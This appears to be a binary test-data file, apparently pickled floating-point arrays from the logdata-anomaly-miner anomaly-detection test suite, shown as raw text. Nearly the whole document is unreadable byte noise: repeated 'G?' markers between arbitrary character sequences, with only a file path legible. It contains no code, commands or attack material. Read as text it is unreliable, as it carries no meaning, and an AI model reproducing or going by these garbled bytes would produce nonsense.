{hG?zFqG?MG?ҝ&U]G?ze`aG?G?N4XgG?wG?ǐG?DG?³G?QJvS2G?۟*G?G G?u=L(G?5{G?Akm`fG?BÕ;IG?&nG?OwWqG?^/ G?~ *{7G?{G?O5G?Q˱.RG?߰BMG?/OsG?z>hG?xЦG?eG?7vG?L G?@ZG?xx)G?Yb&MG? ,NG?jWG?g#kRG?ΌswG?G?X:tG?++#G?[/DG?djG?tG?§ŏG?[ G?6.^^G?;G?ýUQ,G?呾G? 
`?5G?G?G?ݨFo.sG?XFG?3:G?Bjkv;G?(F:G?_ٗcکG?ԫނVG?=K{yG?Eikd G?IG?,kG?22'WVG?(iG?P[Z\G?VjsG?P"G?Øhl G?ʸbbG?:CG?%֌G?|):G?0G?΄ҋ~G?sAiG?X@JG?A=^KjcG?ʓ]lG?X<"G?p)FG?/qopG?!tYG?^wqG?I׍ƇG?J G?a:FG?b G?`>G?\JG?ɣ%ڠG?Ӆ04zG?ϗy“G?SV&G?,ҚG?K+G?6R G?nG?6NG?ﭏgG?M|0NG?S++G?41eG?htnHG?u` G?5sG?[~u G?#dŘG?FvG?a+ NG?G?+M%cG?#G?97vG?=[ \G?!G?a,G?:oZG?4dտG? ?;0p;G?du`G?\D}G?/1KG?v5G?;*{G?ՔᆉG?3hmG?FLG?4fEG?<_}G?kG?ٙG?Vg)G?k&77G?^B*G?%^G?ٖw%G?s'9(G?@G?i25G?탱qZG?nGk rG?G?G?礶^y~G?#̺G?䝺rG?j G?BYUG?}{G?y1-G?~ۋ G?2#G?bBG?AzG?v pG?*G?ƌjȉ:G?ӳ\G?ƥ,G?XaG?X XG?߻G?۔" G?>;G?仴K~$G?ٍ0VqG?e:LG?G?ﻻG?H7aeG?KTG?Pj/G?쪎G??G?sm+G?GG>w5G?$S/^G?SGG?ZG?J G?ZIG?)cG?5!MG?ƌG?LCHG?vG?^R:G?YMG?o瀾G?鶞^hVG? ~G?ً G?*V|G?΀G?],UG?j!UzG? ]G?2bśG?G?bיG?*~fG?*G?/ _G?{IG?qڙgG?H\դG?;{QDG?i1XG?7 [G?^G?,߫G?S˅G?RRyG?R@BG?lGЉG?ȧ(G?3a>G?؇wƕG?'$_G?G?G?1{ 2G?V_G?RBG?epG?1>s*G>˗8 8G?-zG? 2G?<1]:G?a G?3Jh~G?,빩G?&G?^[G?'tWD7G?ʍJ|'G?RWOG?М1{G?VKG?KpЄ>G?)}-)G?JLbG?#ԫG? EPG?b:G?wu(ZG?G'KG?Ji{G?)G?-r G?z<=eG?&23G?d ,/G?=ItG?XeMzG?vҳaG?`XVG?ȄJG?r@/G?̙xG?qvx]G?a/+G?o G?͢3JG?;,G?vsG?mݦG?\t6G?.d G?n#|3G?Y_hG?b[G?n(?AcG?TU<_G?9JG?q kG?G?ӎG?>P"G?wYA@)sG? +G?/CG?O@q]G?$"G?iRyG?ԅeG?&(fG?,ctG?`存G?㪨G?]]t=|G?SAG?ʔJ|G?6G?ZfkG?2QG?s0`G?%T(>1G?kF@G?c/3G?29 G?6w'G?P"ŸG?JBÚG?ұG?y6G?h+X3G?} G?ݚ zbG?8cG?|%9G?sh#G?LF3G?%0e(G?FVLzMG?g`BuG?9G?:iG?NAG?&G?ٟd@"NG?! 2G?ś'G?4㝕G?BD0QG?܉G?aM)G?g&a}G?ԭ wG?yB5G?j^[G?U#G?6G?堽nG?N{4(G?W"?iAG?~ G?* AG?CFMG?I;! G?t4G?#~.G?5G?|\ChG?l8%,G?(HxsG?y9WG?oG?}톐)G?ޮН=G?.E+G?}tG?;NG?+Q G?6G?s/3G?덮%_G?ZڜG?(찙G?`dG?)"imG?}&x.G?v`,cG?)$%cG?kc!G? JG?+.U`gG?#չG??=G?cWG?љ _UG?C\G?Շ#oG?횉C0G?S?x)G?QPG?N6tG?ġj'6TG?'҄DG?7fcG?<ρC9G?2r QG? +G?lnvG?;m5G? `G?G?{G?S 4`G?gBG?gKG?ksG?V=#fG?袌4FG?xhOG?aG? Cط G?VG?G?ԡh~G?hZrG?~_hG?"G?f/ G?Ŭ#G? G?gTG?zG?iۗlG?l㗎G?V8)]1G?S5TG?DoaKG?jL%G?r8G?Ȁ6-XG?F@5!GG?6{pxG?ʱ|3G?G?γ)룿FG?u&G?~9jG? *}G??G?OgG?6G?!G?+ `G?CG?QG?4ZGDG?1&ݓG?&FG?G?)Q@UG?v1Q@G?G?ЪIG?<HG?.nQG?”AIG? ?ĶG?לG?+NG?Ʉ&_G?˗MG?vr*G?2G?/I%.G?S8 G?/B޾G?Z qG?nSG?!?SG?Զ/KG?V)zG?1݇ G?q|SG?LuK;HG?jTG?B5 VG?ꉾ$ G?F{0G?c^G?@kv-G?4gknG?۠RQG? 
ޡ G?GpרMG?IhG?3 4G?s .h `G?$7G?t G?ϯnG? G?_p:G?pG?cZG?R5#G?홦/uG?n:?G?~' G?WJG?߅IiG?f G?lEQG?dEOG?|#yG?w6G?ݿugG? KgH G?2]i4G?#y5G?h7G?u@wyG?d `G? lG?[pG?cG?PGG?LPG?̆G?FDLG?돮G?Fѫ.G?SlǧG?"f!G?fX*VG?G?axG?ҙhDG?}F^G?hG?,1uG?g1qG?zh1G? G?QaXG?'G?js~¶G?. }nG?'G?MBSG?ZiG?G?)!?߽G?6G? G?C/G?Е G?I!KlG?~G>ODZ_G?5\?/>G?wT]f;G?OG?:AG?[KkG?J72G?o.sG?2qzG?hO8XG?N=\G?͔>JG?ւBG?TQ*G?^sӜWG?VkһG?4rR޽G?駺iG?5h.G?vGG?lh2G?PxG?ဉ'l=G?8G?e$G?z(iG?Lt-G?GjtG>wG?S"D%G?G??@~G?ՖNG?T-G?{ܬJWG?kvG?P$,G?;܂G?wq%G?cZ9nG?6rG?C:G?Wz6`aG?fy$G?魠jCG?QT%OG?OU,G?s"3W-G?m!3UG?7 G?]殗G?y9d G?о},bAG?E vhG?ꇊN\G?-crG?Aլ)KG?2c%MG?yioGG?qUk.G?喝nG?Ks8TG?ٷ%>"G?vOG?>G?O"WkG?c -'`eG? \!eG?￉V/G? ,rG?ٍ~CG?s#G?]N>G? q*~#G?HZ&/G?u o@CG?)nWG?NAn3NG?!xG?e]G?w,9zG?ŷwG?,hG?EխG?G?wc G?@G?Е@LG?#G?nF G?'>5G?佥'vG? o^G?:S6G?o\UG?0 4G?!m5rG?`GG?3رG?CG?킨CG?,1rSG?_iG??-G?~pG?IJG?(6G? G?mxG?& G?FG?˃&FG?{.-~G?Z=3XG?TO$zyG?#q.PG?tzjEG?oW*3G?RpG?`}]vG?@G?(:AR G?Gj5G? suG? X7G?(G?}`3G?>;G?VZɎlG?UG?5cgG?qw4eG?x4vG?TxzG?2pG?!?,buG?q fG?(}eG?pG?na$G?-8RIG?oCG?Zz2G?>`G?"FG?e"MG?jG?p}G?@޼G?P G?ѻ˼G?;盗G?)jҦG?XZ>G?iG?A媅G?ھ.dG?G^8G?MjUG?춼oG?q=%vG?WjG?ّFvG?KfьG?eh1G?P_G?@G?:;G?"F(+G?RG?r6xUG?S";3G?qG?'G?֍]AOG?[8)G?]]GG?aK&G?8hMLeG?}_G?.VךG?СG?5G? 88hG?aG?ƻǦG?yG?yG?G?լDG?MuY\G?p<%eqG?#oٓ5?G?C^>:G?ٝ3tG?v@;G?PX"G?۽ pqG?cCsG?xOz%G?(ܻ?:G??G?G??Y21G?R2G?/G?WXͳ9G?{JoG? < G?TH35gG?-G?ˮjG?%Q`G?얫tG?A tG?Ңޥ/G?+QuG??iCG?ϖG?ԻG?沒8ЁG?E"G?xCG?D$wG?gG?cYOG?^0a:G?w%t"G?M;OG?ϿvG?VG?ɔ)G?,[ bG?˔pCG?悛=ĉG?[ݐtG?ZRG?#$G?X9G?V):G?@}(G?7 eG?IEG?sBLG?SyG?DG?Ŝ0aG?]G? >G?@KW+bG?2wvG? =G?U$ G?ژWՋG?(G?? {uG?A'G?zkqzNG?mȡG?a'urG?YG?~}LG?ͱ`ͻ\G?Æ.G? fq0G?colG?WG?JG?G?8|G?VO;LG?2J~G?M/Z/G?QmG?⾘)BG?**'"G?_4fηG?ޮU%2`G?Ʊl?vG?]$p G?XyRG?h$hG?jCwU-IG?킽oSG?ڥNMƚG?cG?<6A80G? R3}G?녂G?j`avG?ھgGG?ޫ KzG?=G?ǵ;'G? G?{̈́iG?$G?Tg#yG?EG?v~BG?k`G?S Q$G?:]G?vd6;G?/MG?G?y2ɵG?\TG?ZG?Qɼ)G?iG?bG?ȶG?X:qwG?FΔG?P.qG?(cG?ݾe2G?ҳG?#>G?VC{G?Dĩ@+G?[>G?& OG? .G?p{G?۬mhNG?4$;[G?ڐNЪŽG?ǔG?<3G?l G?F^G?2,G?G?.Zk~G?y4سG?*G?>1S5jG?EaG?jj7e?lG?L@G?^G?* G?Z(G?43ROG?z4aG?/=hG?xq(F~G? 
$G?_mIdIG?|G?+xG?Ԩb|G?Z 2PG?O5G?jG?$f 3G?-G?ӉǓ$G?T,G?dkG?q@M3G?hL\sG??{W3G?T eUG?޺+㯮G?$!_wwG??z,LG?ggG?ЮJG?8nG?hh0G? 9 G?ogOG?UuG?@zG?COG?Mvq87G?ZIG?Xj= G?"oG? 8IG?2P[pG?V'G?VG=G?^G?gnCG?.mޒ9G?֞G?~G?aBG?;,!G?*#OkG?9E(G?O4G?pfG?8x # 'G?鰹FG?4kG?'*'G?G?]*cG?GxeLG?<#G?m\9G?)!K)G?$G?|M'G?ЁG?ϨZ[TG?; tG?-MS6G?W2RT3G?gG?|S[G? G?͹-G?{W}G?(`G?bjcFG?쉼G?r3+G?-}%G?ꈂEvG?_Wq`G?w'ZlG?'?ĿwG? Bs^G?5G?Ӫ1G?.{sG?"R=iz?G?oO{x_G?3XΜG?ޗ-yG?#1i_G?j46G??"jG?:҅G?@eXLG?~xG?hŖ୭G?ۑ qG?ހG??MG?hAG?쉽q:G?̾ EG?"{G?߳nG?*G?o5oG?OEmG?>JG?U^~UG?Z5G?tG?!=G?H_CG? <$G?F*G?v] G?KG?ΜTG?q=G?DcG?*qQ)G?G?솠`G?,ӿ@G?PΊG?,(G?\ נG?ם:j7G?5PA G?ǜG?t6G?~G?O l$G?ďiNwG?QW 9G?~}G?4ImG?$ۋG? wG?[jG?S6G?:'G?MeG?H'LG?2/G?& Jj]G?M/NG?QG?pG?O<~G?AZG?冋~G?ˤOeG?N G?۳3G?&`G?`9G?}Y&G?N'G?OcjG?g}!SvG?ƴ;G?bJG?0<+G?ᾺG?% G?o<#\G?la0G?}~SG?2ibHG?W~lG?ޱfh>uG?uC G?wju%G?-A^G?T}G?↛Dm6HG? WwG?fw&xG?GC0G?oG?tu1G?9TG?zOG?wna0G?G?3G?ƒG?Vڀ-G?<as|G?e,8G?ڄSG?Ar.G?ˁS(G?+rG?$ G?D G?W5HG?eG?U^G?Tu-ȎG?q]{W?0G?ZcG?2,+EwgG?tvG?/zG?]'G?z6XtWG?܍QWvG?x/QaG?Pa{G?똦:C$G?v(ZG?WG?ǭWG?KG?p%G?2P1srG?ܨ`{G?uG?aG?)^lG?!j:G?, ^G? wG?Ϛ:G?eEkQgG?\v!dG?SC~hjG?ҴPG?RG?m@NDG?S~G?FMW{G?ЄZHG?ʓDG?#@$G?ךrU|G?7G?G?c G?_ƀYG?d˸G?v2dG?L7_G?v_=G??,DG?׆T4G?Rpw G?TB|CG?ˮWnG?w%n#G?NN]EG?gG?lG?˸9sIG? 6(G?XG?MEG?lzG?gkK-G? FrG?܊G?sն&G?(|)-jG?kLG?ǎG?`wqG?JO3G?u`yG?DG?A߇G?ޓd:QUG?Ae@G?b@G?>0G?srG?QN1e](G?%>7G?ExG?yG?%(DG?v>.ooG?Gki]ѺG?3PYuG?R*3G?ȎG?=kNSG?o6QEG??G?Q)G?>~HG?պ4;#G?G?j G?dn(OG?s(G?dv/G?a g>G?ZgG?;2eG?_rG?26ϙG?BG?`F*zYG?q1&D3(G? ~G?1G?1ƉG?C@DG?iƑG?9qG??G?>~`Σ/G?MzG?jD G?DV0G?[|0G?2 5G?چ̒hG?j氰G?gMtG?ՐWXG?܏.G?/ ]G?ɺV@G?ЎwG?ݟrG?>eG?⩹}ՠG?aUG?PjG?:G?'J G?u1G?^ r^G?G?yG?0qAG?5!%6G?-G? (G?u&G?T$RVG?+^+:G?ͭl`=G?lG?IRG?ԾG?vќJG?ȿG?]G?yCoG?1>O*\G?ֈ2LG?ݕzR0OG?cY^qkNG?YG?)ucG?\I|G?ȅG?G?wG?t|jG?VJG?G?xgG?o`G?(G?TvhG?ҚwCG?K0G?+VWG?ܯXG?Rp G?̧4nG?G?|" G?.nܯG?ȅy؅G?tPs^G?\qO2G? tG?-@zG?0'G?Z*G?q8w?G?R lG?%VG??n",G? 
2uMG?h}\G?[G?VQӦG?怿z=G?烈uG?PMG?G?^mΔG?#7G?:g_ G?ժk"G?LG?pyhG?@ tG?G?T AG?h8G?5xQG?ʑGG?偬G?qDG?($PG?د:G?Wp1G?򭫽+G?цG?l0ua}G?OG?a'aNG?&~yG?2GG?"G?s/PG?W)G?ƺ=G?G?ά=>G?T~G?M G?oueG?+G?TG?3s|G?ݿ=7?G?dG?̞G?G?sE(LG?e G?Y]G?x G?FqG?JHG?}3LG?0- G?#UG?Kv:G?f?G?G?׬|G?蜎hG?'$2G?S~WG?3%G?L%U_G?~8}G?m G?qG?9˪-G?zK]G?g>G?ū],G?܅-G? sG?NGG?AꍽG?0<=S4IG?_@G?GfG?yG?i/}%G?Ӝc…G?')1G?.ۍm҇G?wDG?ENKG?bKmSG?WwG?FƩG? >>G?ngG?B/PG?G?0 =)G?౗zG?G?JG?9X0 *G?^bG?Ը)G?OG?TJG?ٌG?6mo%G?Ox}G?BDG?e NG?ŲŷG?*k#=G?쬨JG?4B{G?YgG?F G?`bG? Ux՛G?/țG?"G?BMG?I&xߝG? )כG?P G?s)G?t?$G?wG?S/G?쿳 5G?)G?tx0G?G?{姥G?tLG?*!LG?Ό=OFG?_wG?Msvj>G?:h_G?nzG?9ˠ'G?;LjG?CzhG?iRG?V&g{G?IJG?@iUn G?"G?MBG?u< G?4hG?G? JjG?WG?K gG?Z bG?#wG?-1rG?XŒG?|qG?/G?0٦$G?|#y;G?[G쎻G?q|v|G?-isYG?4G?Vd iSG?=G?)G?yF:G?ˣG?7=1qG?蘘=G?aE G?NG?%=G?XG?HY?G?jG?Ӕ+e\G?%rG?y&*XG?=G?ưyZG?rG?JA)5TG?gG?6lG?lOkiQG?<:i#G?]8gG?{‹G?rnlG?q4MG?$>iG?Ą +>G?bwrG?OAG?绺ǟG?Ԙ'G?'nYG?N/G?&*G?aqG?]:xG?GbQG?# :G?8[aG?e{|EG?ξG?ѨJ.G? .N+IG?йV(G?$G?|JG?!XGG?AUG?=~G? YG?VOG?#G?{3G?xnCRSG?UG?g'AG?tG?|JG?<7ӘG?ϫ?G?ẘH;G?)G?M}sG?ܸ5G? G?4!ȜG?խw0\G?06G? (G?stjĊG?@G? ETG?.MG?> D3G?[l0(G?"G?5ÀG?/NZG?vG?hG?fqӡ~G?&pE:G?`'G?jG?SMG?i*G?8G? lG?̶G?8 LKG?t#tG?soG??c@G?,#G?滺 rG?/G?8G?c)xȂG?*%x G?TOjG?G?_84%UG?#G?,7pG?gO3,G?-DzxCG?ǧ<5iG?hGx&G?Y RG?U$шG?d>jG?2ZפG?ĹG?UH7G?bT'`@G?Jhqs&G?noTG?ݼVhG?|YG?'i1>G?g2EG?vG?o,4#@G? dK1%G?QG?99G?PpG?e(G?L;րG?fG?Z~G?2(G?j:DG?-iG?8OSnG?`+KEG?DNG?#DG?Wj4:0G?ݰ5mG?G?UMG?G?L/wG?{z G?1ZG?+;ڷG?]@G?ExG?ь\G?DٽnG?xQG?X.G?1ByG?`H~TG?= nG?FCa9VG?9&G? gG?l RG?uG?IG?cK=1KG?9"yG?hZG?/ >G? ViG?$1G?2G?/]G?< CG?mGG?]XCq_G?$G?K9 \G?.ɭHg/G?G?:N|G?w^ pG?YAūG?D5G?WL9G?^G?댈mgG? G?셮@@QG>pQwG?ւ0cG?hlG?8&wG?mG?V饊G?[d G?T 4G?ݓUG?ZX`G?ZmG?K_n5G?_dqG?f̈́G?ٔ*_DG?=-9G?ҚSG?TG?y"\`EPG? ]G?,4?G?*#G?Þ~0_rG?jwPG?T)zG?1gG?_G?IvG?2G? =NG?B6G?QU<G?ւ<&}gG?28+G?Xn8G?ʦv'G?FrrG?bLG?o6G?xPG? G?G?^G??pG?7m]G? 4G?h;G?Զv: G?!wG?ꡩ'`G?S?G?N-\27G?Y$NG?Uc G?FZ6fG?8 >}G?{U"G?-_[G?x҇G?]>G? 
ߙG?85{^G?QG?NG?:+3G?oG?/gG?}5BG?6G?ї bpG?sb^G?r^g0RG?ÜG?vyG?ioG?2C'G??G?4iBG?nG?:H)5G?qG?8TG?ɬ2G?͈G?~0wG?|1G?ƚ*GUG?:EG?H G?7S6G?G?i)G?/G?֊: G?XG?ˆwG? G?G?%!`G? G?!cG?SG?S1G?7(}G?ga%G?̨G?G?򊤯NG?ʾG?후mQG? pG?^є QG?vJ}G?ЕW8MG?MZ)G?xG?SG?T G?XJAG?NG?#рG?v|x1G?ؗG?S=2G?UmMiG?IwG?Ari8G?놿G?nKStG?z[׊G?UYmG?/,G?7G?[skV>G?ؑWG?ȲG?,١|G?~.HgG?HuG?;r'G?TCG?Oh!G?壑NG?O犝G?F\G?;G?\~G?[u-G?䝨fsӜG?:4G?P-G?N*!ðG?ڢLG?]0KG?)ͿG?YG?z pG?,TG?Yp$G?ػ\G?nG?ӵsVG?iG?cXyG?1jڢG?dG?JA0)G?>qG?#)@G?٩SmG?9 6G?|$yG?ʹn*G?>G?tqPG?ʳ];G?Q!G?є[ݢG?=>G?lqG?g+]G?ͿyZG??#jGG?!nG?ԨeG?~tG?*nS#G?v#cG?j='G?<~GG?۞G?=3+G?/L0G?OhxG?beG?AIG?쓒G?PG? $MG?-JG?52"AG?R R=G?{,9 G?K$l[G?KG?PWU L+G?6G?N$ɄG?ʐqG?*TG?Zg"bG?Uҗ G?xK2yG?7]G?xG?G?@LG?%G?=WG?n<҇G? )G?|=? G?ߝAhG?xJG?kPH]jG?=GڗG?#S%G?޾[aIG?ҿJi^$G?c)G?wŸVG?Lh2G?.G?(6:RG?*G?T6qG?&EhG?N@ G?%GmG?:G?苾TG?̖rvG?c}G?t YgG?0M)JG?>JOqG? wMG?ػM9,=JG?5G?Q}G?)TG?M/.G?gG?5ecG?t(G?gڅ1G?&|G?2EG?M.4TG?G?e5jHIG?6|G?VB$G?OaMӄG?k]G?VUCG?(dKG?Jm G?v7lGG?е,fG?ܹG?0G? G?r7DG?\"G?젳0&.G?_xSG?߄pNG?YG?ųѕyG?Qk[dG?OXG?9y\EG?G?G?#n;G?ϿG?ze](e](ee.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/beta2_data_test3000066400000000000000000000432761437606560100275320ustar00rootroot00000000000000F](](G?/J>G?5fO2G?n1G?)pS\G?F6G?蝀G?MѰG?>4jGG?jQG?7zG?<~G?]S>7+JG?~=$uG?0>6lG?с)"G? eG?q |%G?6G? 5G?Ŭ[W G?oҢG?BG?d8G?VJ$GG?P-G?3:G?GG?jL4G? G?43j{G?a5hG?֗? G?>sXG?̇G?tgKG?m-\G?}G?B G?r6wG?G:dG?呅+UXG?{G? G?DG?hLG?yOSG?_Gu`G?S AG?⎦++G?[?)9G?ǶzG? @0G?ywG?x {G?q\9G?W5G?eqG?G?n'֚iG?3Xy\G?ȡ[M)G?S G?R@^G?@MG?fG?266G?hҡ,r+G?"G?&}yG?l8 qG?K<G?Zf3rG?G?Gc5G?kG?wG?׺TpG?S|[tG?oc‹G?  G?|אָuG?V6@G?{lG?ԅUG?`G?J:G?7A%G?zFG?+EBG?"BȶLG?vNG?xG?K#G?# G?|G?SohG?UXeG?3#IEG?ƧG?~ ԋ(G?$oBG?TvG?#.G?n8R0G?r;/G? .G?.G?픗ŮG?'+G?8&-G?m@#G?FG?m9G?>2]fG? m582G?GR)G?i'pCG?|SG?ӏG? >G?33&G?@LG?!hG? xB'G?:3dG?G?5@G?bbBG?cAG?ýhG??NEG?ۊ$G?,ػ_dG? 5G?yyG?( G?,kIGG?&G?irG?0=G?')"G?gx~G?^*X G?9]G? BG?d=G?>>qG?&BG?~5G?d/G?Y1ԖG?iƜ3G?篚|G?o}GG?iP /G?s%f G?6eAG?vJJG?6YVG?;G?:}'G?P|G?c2G?ᐧ,TG?jG?\oHG?@蔡'zG? 
}G?qoG?BmG?C 'goG?w蘊G?{G?!5G?vC5G?ȃG?TA07G?j=G?aE@k3G?נI뛢G? c[G?{B/G?-*G?P\ G?2 XG?rGG?iz9G?]G?'7'tG?MݥbG?2wXG?hY}pG?18I{G?aMd6@G?AGG?RC;&G?C-cJG?SH3G?Z~EG?rjG?몝O1G?Zܯ^G?6$G?OItG?v/ccG?܉X5G?~| PG?z$G?JNGG?}QwG?jlp.YG?'`G?o&G?41G?ۏ G??f6UG?i)qasnG?v\G?@>G?9 G?V G?յG?ԌަG?Sc"!lG?f'LG?mA?G?]k6G?橿 WG?[ G?&nG?"FG?N3G?IV4G?ї2OG? pG?QQcG?[`rG?xTX5G?抁2D+G?c1G?8'>yqG?#NKwG?y" G?ZnG?RKDG?PpcG?*؏;G?t(G?ijG?dc%G?]1ŸG?q'G?w6M{H-G?.+0G?kEEG?_ G?{{vG?'G?^I\yG?9s`G?kYXP^G? j VG?@̼BCG?;!G?!4 G?ZK2NG?s|sG?KCG?DqSD:G?_IpG?M*{G?|PG?j.*RG?-;G?;i>(4G?XG?6,G?Z\&YG?@UM8G?y,)G?m@D~G?@3kG?EWHaG?3{G?+bI8oG?ߖG?yCǵG?G?aOWG?.:%G?,L}G?x-)G?FUxZG?߁G?˯qɫG?䲻AqG?u:IG?ꉶv_LqG?jCfPG?~3hsG?G?~&G?#+jG?A_G?jUG?.F<G?l9G?j7+ʅG?愚G?VG?ں*G?qAG?Bp ?G?顨ܐ`G?ė*仳G?|"6#G?s6#RG?"[ G?L%G?=z=G?yG?[ G?ϔf`G?뱝4xG?տiDG?=hG?UJK G?KVUG?CeJ/G?>DG?~dG?ZˉG?O Ml+G?c`6PG?Z8mG?̲{NG? G?gf@0IG?@G?U:G?hG?݌ØG?슫8XG?btG?%%YG?nG? 9G?"tG?Srk0G?-xG?@YG?U^dG?žBG?&!G?j9G?lgG?9$3G?SG?0G?)G?B`:*G? x1G?sFOG?8ݽG?~#HgG?M~+G?hlG?cG?]%MvG?UG?ʃɖׅG??CG?ᳳڰ>G?T\r/G?QXn$G?A0uG?铬5G?u]X/G?ۏ=ÏG?-/ԼG?:bG?)'G?L^;$G?G?uع#iG?@z8QxG?Q-G?ܫzG?G?:#~G?pNG?]\}G?&G?jEG?b٢m&G?m{|vG?RD1G?nG?NG?fG?gG?F\1G?alOG?خ K'G?/'hG?lg@5*G?ph˅G?cG?rmG?RץHG?sst:G?CZYG?'G?8w?JG?:u7G?朮V @G?ꀢwG? OG?oCrG?銗 9G? fE:G?+`"aG?AXG?6adG? сG?̎G?`EG? ` G?H$G?J&EL#G?1pG?kzG? FjG?πgMG?9 oJG?'G?~G?kǼoG?E_b(G?i G?E{"P)G?pIG?v|TG?G?n`G?烔]DžG?[G?l?KG?FgG?;;=oG?uLRG?O2G?laG?^黶bG?[IG??SG?پG? ޕG?㣲z0G?zpG?wWG?+wNtWG?q<9G?;!97 G?BzG?vjRG?㾙G?2/G?/G?.G?槭}nG?`Gi8G? 5G?ryݠPG?1r]kG?9#ի G?"G? G? 1%dG?ှ3u`0G?`NG?DݧG?能#G? $1G?꽟/ BG?SG?pG?r7G?!XG?o~G?G?OG?; G?{G?+iG?SȻuG?IeG?JiG? OG?3G?<: G?J oqG? ~ G?fG?O4 G?7'HG?rfG?LTyG?-'ۼG?{G?uBG?ݬDGG?G?LG?DG?żG?lG?>oDG?ƱG?|sG?VG?~5\JjG?@G?[ [G?5n8zG?(gitG?subG?aG?煳DHG?8G?)z7G?}y>yG?c/;KG?G?bŒG?u `G?⢥+G?2G?ԃG?o'WG?<#HkG?鳇GFgG?Eƿ7G?0}]G?F;)G?tcG?öYAG?QG?S6O:G?I yG?{;IG?SG?6tG?ۿlG?;ߧG?3/G?PrmG??gQG?RsG??G?InhG?F_ohiG?? G?d%7G?/G?&4CG?ZO1G?8&#GG?처.Y$!G?f-tzG?'&|jG?rc L G?o5G?驑BJHG?v=`XG?hG? 2`8G?xXe]G?WqCG?'G?VP G? "6G?R!,;/G?~d)G?큡ԛG? G?НǼ/G?A F|G?izG?yHG?j}UG?g0G?wO G?CB>G? 
ݔͱG?BWG?AfZG?觠|"G?hҠDG?74&G?PeG?G?ISG?)m2G?Qh6SG?qlbG?)1QG?.>:G?X*aXG?i= G?x-eG? AG?pṩG?qsG?{VG?X1G?ܜG?+G?g2UG?:QVaG?s0,G?5kG?@;G?gKdkG? h|oG?,*G?fG? 4iG?{tQCG?{Q\G?!oG? E MG?H]nFG?71G?+FTG?$$8G?"#xjG?법 5G?8޸MG?3ǬG?Po9lG?G?@\kG?僠~SG?(!* G?F^+^ G?E1LG?"ѽG?M{2G?t^NYG?%&mG?'s/G? G?!G{G?IG?[.G?NbG?7:UG?G?xG?x_"G?WG?vϤG?%ʞG?=iigG? (~)G?dG?k{8G?* G?wkG? G?BqQG?>;ZG?ct G?탱 G?o[#G?L^ G?@G? dPG?:|?G?X \G?\̈yG?kYG?o0UG?s]ۮYG?盼;.PG?۩iGG?&Mc*G?[MuG?̑3zG?svSaG?UAG?pcacG?ݿMZG?MG?vG?_/ѳG?#9G?B*G?bIG?VSrG?UåG?)*euG?] G? )g}G?k8AAG?ބ&G?_̤G?J"kG?JмG?=`G?gG?)KgCG?6y% G?)'G?^G?yWG?v>G?ȡG?G?8£G?|G? a(G?ꙏӓG?s1G?'nG?ݴgG?~ G?ݝG?JsG?KG?O9VaG?[Y4%G?وlr#rG?1bG?G?G?+eG?P2ZcG?!>j_G?`QG?/\G?ɛG?tG?)uX(G?u,NG?OoG?ꃊG?0i-G?<ߩz{QG?{JG?7ȭ8G?W;G?!)G?ݿ쇥G?9 G?:aG?W~tyG?(*F5YG??sG?.G?.ZG?yG?Kt^AG?꜃wVG? P$~G?G 6vG?CaG?qei[G?%̻RG?wG?# 7G?G?S5;G?TIIG?1kHG?%,gbG?nx8G?CՌmG?¤HoG?5?0G?T41?G?g;+dRG?84G?dhh\G?G?vIG?.^'G?ۇ^S~G?G G?'rG?wvG?T~VG?'%G?6G?]{yG?B7,G?BPG?jwuvsOG?FhgG?:aOG?_}-G?j|G?+reG?>`=G?k&G?G?|n%5G?&GkZG?YΚG?SG?<iG?kP] G?{eG?)6G?g`FG? { G?CG?[G?eG?/xG?贿04c;G?%yG?{O|G?v7}G?`q"GIG?#FjG?ATG?нG?dG?wGVCG?!pG?ȫt)G?咯G?3kG? *Z[G?\1G? fG?+\ G?wCG?֍| 7sG?eYBG?mgUGG?/NG?vLbG?TG?Ww!pG?^3G?OX}G?݁ZۋgG?N!lG?w5~G?Ľ0G?꒔ߖ4G?clG?cG?wCyG?J . G?뫾4nG?}HmG?_P<@G?e%X#EG?q+`xG?ZdG?I|G?줆oNG?0 %GG?+kG?0ՠtG?Co G?)$FeG?^D%G?FG?k6G?>ՐG?G?/_Q#G?f^G?nG?/M8-TG?"ӹ{G?鎗KգG?KfG?*[/G? G?}mG?ܽG?i!tG?$eyH1G? rewG?[zkRjG?莣QG?ԏ wG?S YG?q:ƼG?Cn#4G?}n?G?%vVG?C_%G?[x:G?;UK G?E!G?+ G?هG?ibÎG?Iĸ%G?^CG?CG?JG?",6}G?,C ^G?:)G?ȫ%7F G?eqhG?pNG?4&G?C/|G?<$SG?餥NG?AG? G?̑G?ZiWG?j JG?5DYyG?V))G?e\G?I< G?vjG?@CǑG?vRP'G?cG?CCvG? Q G?5-2VG?1|G?/G?,$zG?嚽.G?ڥPUG?.ngG?D:G?vG?/iG?VճWG?|釶G?h~ UG?G?ZRG?E s.:G?4VZ(G?ZcsqG?2U G?aJG?1ƫG?9G?WV.DG?waėG?Ӫ-G?h<⪹G?XqG?XbZG?㟻`G?kpG?傂OG?E{}G?MzG?Y4)G?bgOG?XG?DفG?LBvG?P;/YG?-vG?nZG?WG?xI-XG?E QG?T9OG?LhpG?AG?U+VG?ޛH+xCG?ꄓԸG?bG? nhG?3G?qfclG?G?傑+kTG?SG?V~G?qTG?P~G?q1G?혺^zG?V џFG?d G?1ՙ"mG?ߞ_xcrG?OdG?CZfG?t-l8G?)CyzkG?wSoՕMG?GIEG?t=}zG?GG?JCG??G?mR$G? 
toG?]G?WFmCJG?$%zG?h[G?:aG?Y0*G?zI)G?4G?Y,@G?4jG?n[G?{G?TͧZkG?6{G?=>z1G?8nxG?柜}EG?ۡsA@G?kôG?Mo "G?9G?浏ңG?VqG?ۑq$G?ۆۣPG?ꞒEyzNG?͢G?_j`iG?oopyG?[EG?>&~G?1G?4{mG?|,(G?U.G?됌kzG?yهG?XȤNG?睁YG?1} G?^tG?o@G?-KnR9G?漀K2NG?xRG?=>G?I 1G?ꋗ' G?ߨG?iNG?[)G?OȸG?SQG?~G?ۖG?KG?XکG?e )G?駎G? limG?AaڳG?B0{3G?\, K`G?ZnG?}5G?&b8 >G?DS+5G?"bG?u)VG?ڱT7G?keG?XG?fo G?טHG?Es.NG?tG?SxDG?YG?}@gkG?nvXG?iG?$Y=,G?-"&G?|hG?G?UhdxG?;S#G?tG?vG?SG?Xyױ}G?%_#sG?oÈG?(Q,G?G?kĖ%G?!p#G?ϵ [G?""G?EfFG?ߜ :G?AnG? O*G?lnlG?.&J,G?L9G? yBG?uPdG?:fp{EG?SVG?sݮ]G?mG?\=mG? G?OG?,KG?䯅(G?G?94 